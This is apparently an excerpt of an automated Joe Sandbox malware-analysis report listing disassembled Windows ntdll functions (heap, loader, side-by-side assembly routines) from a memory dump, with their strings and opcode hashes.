                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 34571FA9
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                  • API String ID: 0-861424205
                                                  • Opcode ID: d6a725a78c397c0f539df58eb04e254ca28ccc0e54d166eaf48786a70ce6d0c5
                                                  • Instruction ID: 2848dc866a0cb82e90349e5d831ac605714f0b3c05299309774b7023ee8405ef
                                                  • Opcode Fuzzy Hash: d6a725a78c397c0f539df58eb04e254ca28ccc0e54d166eaf48786a70ce6d0c5
                                                  • Instruction Fuzzy Hash: 4031C776F01624BBFB118A96AD40F5B7B6CAF51690F414469FA00B7341DA30AE41EFA1
                                                  Function 34510680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-4253913091
                                                  • Opcode ID: aed31a1a6815b1330cccb362b9dc8170a7bf93366e16b5cf2927f8a6961299eb
                                                  • Instruction ID: 49575d588132afecceb2c3afc25a1da90266d15e0969059d84cdb790f34235c2
                                                  • Opcode Fuzzy Hash: aed31a1a6815b1330cccb362b9dc8170a7bf93366e16b5cf2927f8a6961299eb
                                                  • Instruction Fuzzy Hash: E9F1B875E00605EFFB04CF69D890B6AB7B5FB85744F1085A8E4069BB81DB34E981EB90
                                                  Function 34529723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 3446177414-2283098728
                                                  • Opcode ID: a7004a84ab03d9edd343dac55355895550328b36ccefea81f473cde9e874b6db
                                                  • Instruction ID: b45b7058e039a8a8cd6fe7df82a68d49451715902893adc43c7e4b2f26319160
                                                  • Opcode Fuzzy Hash: a7004a84ab03d9edd343dac55355895550328b36ccefea81f473cde9e874b6db
                                                  • Instruction Fuzzy Hash: F951DB75F01701DFE710DF28D884A2AB7A5BB85314F580A6EE441AB3D1EB31A845EF92
                                                  Function 3453C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 345780E9
                                                  • Failed to reallocate the system dirs string !, xrefs: 345780E2
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 345780F3
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-1783798831
                                                  • Opcode ID: a8101680a2a5c54f24702c84323fec9059d8bc7927aa3a1af9fe62c6b7094b00
                                                  • Instruction ID: a66db5261d1ebb824184d48fa114d48deddfe64761e6970993d83e5a11c8c18f
                                                  • Opcode Fuzzy Hash: a8101680a2a5c54f24702c84323fec9059d8bc7927aa3a1af9fe62c6b7094b00
                                                  • Instruction Fuzzy Hash: 9041A2B6E15300EFE711DB68DC44B5B77E8FF84690F40492AB948E7251EB70D801EB96
                                                  Function 345DACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: eb9b3432cc317a83947392b617b207eeb85188485d1d3f3c1b2401ae1d8c4529
                                                  • Instruction ID: 2cabba91651df8ad8a675e8e73bedc28670f0b934f03833c69823b19b996b103
                                                  • Opcode Fuzzy Hash: eb9b3432cc317a83947392b617b207eeb85188485d1d3f3c1b2401ae1d8c4529
                                                  • Instruction Fuzzy Hash: 97F105B6E006119FDB08CFACC89067EBBF6EF89200B59416DD466DB384D634EE41DB50
                                                  Function 344F7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                  • API String ID: 0-3061284088
                                                  • Opcode ID: 1ed597c2d23f7448c45c8a3cb9389ecf59db3980f26cbe4ec4d0f5cb577b6175
                                                  • Instruction ID: bc5362f79050bb6cf245632fbb1ad3fb4047c6544e321316364f823e20bac7b7
                                                  • Opcode Fuzzy Hash: 1ed597c2d23f7448c45c8a3cb9389ecf59db3980f26cbe4ec4d0f5cb577b6175
                                                  • Instruction Fuzzy Hash: 45014736405280EFFB05A768E818F9277A4EB43731F1444FEE0004BAA3CEA69C45ED60
                                                  Function 34500485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 34500586
                                                  • kLsE, xrefs: 345005FE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 3446177414-2547482624
                                                  • Opcode ID: c7da54711248086e693e53853f4af111e2db1316dfef31d4b77db7d07cd97973
                                                  • Instruction ID: 4f45972f8459d4f684f4c5ab28df95f4329f6b8ef9955b2994628c8c31730d1e
                                                  • Opcode Fuzzy Hash: c7da54711248086e693e53853f4af111e2db1316dfef31d4b77db7d07cd97973
                                                  • Instruction Fuzzy Hash: A851CEBAE00746DFEB20DFA4E4406AAB7F8AF45700F40883ED59A97240EB30D505DFA1
                                                  Function 3450B5E0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LUM4$LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                  • API String ID: 0-1429820797
                                                  • Opcode ID: 6aeeba84cd46b9fc8ee2786d59e1d49d159b2d1e493b6e4398646357f569c2c8
                                                  • Instruction ID: dcc45efde6dbc2e2fc519b414ae1b4e70d2e6c54b3f741d3ff5ff10188b55cb9
                                                  • Opcode Fuzzy Hash: 6aeeba84cd46b9fc8ee2786d59e1d49d159b2d1e493b6e4398646357f569c2c8
                                                  • Instruction Fuzzy Hash: A3B16879E106458FEB15CFA4D890B9DB7B5AF94798F60882DE812EB390DB34E940DF00
                                                  Function 3450A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                  • API String ID: 0-379654539
                                                  • Opcode ID: 8f2d4968e3a1f766ad1ce8c9b8d2612e88dcf3edb10732453019248b20d48721
                                                  • Instruction ID: cb248842e639a958633ff8588ecf3dec7d12dd8d7421013534d205073e54244e
                                                  • Opcode Fuzzy Hash: 8f2d4968e3a1f766ad1ce8c9b8d2612e88dcf3edb10732453019248b20d48721
                                                  • Instruction Fuzzy Hash: 35C15778A08382CFE711CF14C540B9AB7E8FF95744F40896AF8958B650EB78C949EF52
                                                  Function 3453265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 345720C0
                                                  • .Local, xrefs: 345327F8
                                                  • SXS: %s() passed the empty activation context, xrefs: 34571FE8
                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 34571FE3, 345720BB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                  • API String ID: 0-1239276146
                                                  • Opcode ID: ecd2ddb9558d10056d67847c3e649659efd74f707dc8b2c1e13a5a782705a606
                                                  • Instruction ID: fd490fcef1bc0343663616fc5c7e081b6c05e0c411d2741a796c073eb8df8312
                                                  • Opcode Fuzzy Hash: ecd2ddb9558d10056d67847c3e649659efd74f707dc8b2c1e13a5a782705a606
                                                  • Instruction Fuzzy Hash: F5A19C75E02729DFEB20CF64E884B99B3B4BF58354F5045E9E808AB251DB309E81DF90
                                                  Function 3459327E Relevance: 5.2, Strings: 4, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}N4
                                                  • API String ID: 0-3883691528
                                                  • Opcode ID: e259da83599e75c2ab7fae667976ae7ad746afe96b6af32b287f609b9105efe7
                                                  • Instruction ID: f51560d96d998f8c8e9b892c34137a729da5996994d908a34807c7bed9bec046
                                                  • Opcode Fuzzy Hash: e259da83599e75c2ab7fae667976ae7ad746afe96b6af32b287f609b9105efe7
                                                  • Instruction Fuzzy Hash: C9819B75A48340EFE711CB64D884BAAB7E8EF98750F40092DF9849B290EB74DD04DB62
                                                  Function 3450B360 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LUM4$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                  • API String ID: 0-3290304134
                                                  • Opcode ID: 5089aa17a75d9d7dbf228d7a4912897b7e9bbffaf1541ff9c24b1e56d79c767c
                                                  • Instruction ID: a7e797fc9155de590a947f6be8750b4b87acb7e6e66472afea49615e40bff58b
                                                  • Opcode Fuzzy Hash: 5089aa17a75d9d7dbf228d7a4912897b7e9bbffaf1541ff9c24b1e56d79c767c
                                                  • Instruction Fuzzy Hash: 8991EE79E04355CFEB11CF94E48079D77B5EF11368F548599E801AB290E778DA40EF90
                                                  Function 344FF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                  • API String ID: 0-2586055223
                                                  • Opcode ID: 62f41be201f1a93919e4cdcad0740ccbd4f4d9195ef39415a7fb71d5b453ad66
                                                  • Instruction ID: 43f78669d2961cff71a757b9213b7306042b79f2a3d9637eb62d01a7e3909e34
                                                  • Opcode Fuzzy Hash: 62f41be201f1a93919e4cdcad0740ccbd4f4d9195ef39415a7fb71d5b453ad66
                                                  • Instruction Fuzzy Hash: B36103766447809FF711CB64DC44F2BB7E8EF84794F0408AAF9558B2A1DA34E801DB66
                                                  Function 344F90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                  • API String ID: 0-1391187441
                                                  • Opcode ID: f2f0d1e9c61bf45c6d88e0e4983cbd54a8bac232bcc8859f9da3b2e607227a4b
                                                  • Instruction ID: 48ccf755163a553e4f41977ddc9236e97fce51e368c64e554e9c92d547fdecef
                                                  • Opcode Fuzzy Hash: f2f0d1e9c61bf45c6d88e0e4983cbd54a8bac232bcc8859f9da3b2e607227a4b
                                                  • Instruction Fuzzy Hash: C631D436D00204EFEF11CB54DC88FAAB7B8EB45760F1444BAF415AB2A2DB31D944DE61
                                                  Function 34541190 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eS4
                                                  • API String ID: 0-1389716106
                                                  • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                  • Instruction ID: 929dd29aa7a97be97c8ad00f6cbbd4c500075e3600d7b71c1af1554863bf00a7
                                                  • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                  • Instruction Fuzzy Hash: B1314F75D01619FFEB11DF96CC44E9EBB7DEB84660F404425E914EB2A0EB30DA05ABA0
                                                  Function 34507072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 5e48b1a8ba57dd56f3de2b4faccfe5a1816944c29f1f2ea2d1d6637c97d0f5e9
                                                  • Instruction ID: 4fea9e34b91882af7e738e0c86bf9831b1f2eccb8791609787b4751cbc2657bc
                                                  • Opcode Fuzzy Hash: 5e48b1a8ba57dd56f3de2b4faccfe5a1816944c29f1f2ea2d1d6637c97d0f5e9
                                                  • Instruction Fuzzy Hash: 33510E38E00605EFEB05CFA4C854BADB7B5FF54359F10822AE41293290DB74A911EF80
                                                  Function 34593608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                  • API String ID: 0-1168191160
                                                  • Opcode ID: 8893b283ae9e2ae992f49dbfdc1684dc3ea3aae8c8f42916c2241a4730743a17
                                                  • Instruction ID: a71ed3cc61f957c67c6fbf24a84907005921ed3f3bfc3db7db518a986bbcd7a4
                                                  • Opcode Fuzzy Hash: 8893b283ae9e2ae992f49dbfdc1684dc3ea3aae8c8f42916c2241a4730743a17
                                                  • Instruction Fuzzy Hash: 31F15BB5E01228CBEB20CF14DC90BD9B3F5AF98754F8484E9D609A7240EB319E85DF59
                                                  Function 3452F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • RTL: Re-Waiting, xrefs: 34570128
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 345700C7
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 345700F1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                  • API String ID: 0-2474120054
                                                  • Opcode ID: a2bfba532b931fdea3c05dff3c6c4f5f3e7b90c2b9a7c4114467dfcc1cf1dd76
                                                  • Instruction ID: ccca40fd1660f815386bdc429172864e896be54a92d9dba2282a754cd2a70afd
                                                  • Opcode Fuzzy Hash: a2bfba532b931fdea3c05dff3c6c4f5f3e7b90c2b9a7c4114467dfcc1cf1dd76
                                                  • Instruction Fuzzy Hash: 65E19D76A04741DFE711CF28E880B1AB7E0AF84764F500A6EF595CB2D1DB74E944EB42
                                                  Function 344FA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                  • API String ID: 0-2779062949
                                                  • Opcode ID: 0c0d933fcb8500b58af9ab94bbf13ebe17e209193865f40d58f9124e2045337b
                                                  • Instruction ID: cc5f00e2d67f85f44744c074161fa73a6e1d292e5e3a0726cff43e4ad2f4fa1a
                                                  • Opcode Fuzzy Hash: 0c0d933fcb8500b58af9ab94bbf13ebe17e209193865f40d58f9124e2045337b
                                                  • Instruction Fuzzy Hash: 87A19D75D016299FEF21DF24CC88BAAB7B8EF44710F1005EAE909A7260D7359E89DF50
                                                  Function 345DB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 345DB3AA
                                                  • GlobalizationUserSettings, xrefs: 345DB3B4
                                                  • TargetNtPath, xrefs: 345DB3AF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                  • API String ID: 0-505981995
                                                  • Opcode ID: a5d4b0c3c250b9fed255164efc3559933875bccd4c8a27c242718dc4eb9a01e4
                                                  • Instruction ID: 3e8407766c12f856293fd5a662a328d704b22defc0d90bd77c1a102e901b4b54
                                                  • Opcode Fuzzy Hash: a5d4b0c3c250b9fed255164efc3559933875bccd4c8a27c242718dc4eb9a01e4
                                                  • Instruction Fuzzy Hash: C7617F72D41229AFEB21DF58DC88B99B7B9EF05710F4101E9A508AB250DB74DE84DF90
                                                  Function 344FF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • HEAP[%wZ]: , xrefs: 3455E435
                                                  • HEAP: , xrefs: 3455E442
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3455E455
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  • Opcode ID: e68d2e8cff0659c4cef1529f6e06358b5027b2273e7af78d90172d0dd489200d
                                                  • Instruction ID: c3a86a51f774a77897394cda3e5814871a94152477874d456fa6af5434e052fe
                                                  • Opcode Fuzzy Hash: e68d2e8cff0659c4cef1529f6e06358b5027b2273e7af78d90172d0dd489200d
                                                  • Instruction Fuzzy Hash: EC51F235B44B84EFFB11CBA4C894F5ABBF8EF05344F4440AAE5858B662D735E901DB50
                                                  Function 34521514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • LdrpCompleteMapModule, xrefs: 3456A39D
                                                  • minkernel\ntdll\ldrmap.c, xrefs: 3456A3A7
                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 3456A396
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.136238725526.00000000344D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 344D0000, based on PE: true
                                                  • Associated: 00000003.00000002.136238725526.00000000345F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.136238725526.00000000345FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_344d0000_x.jbxd
                                                  Similarity
                                                  • API ID:
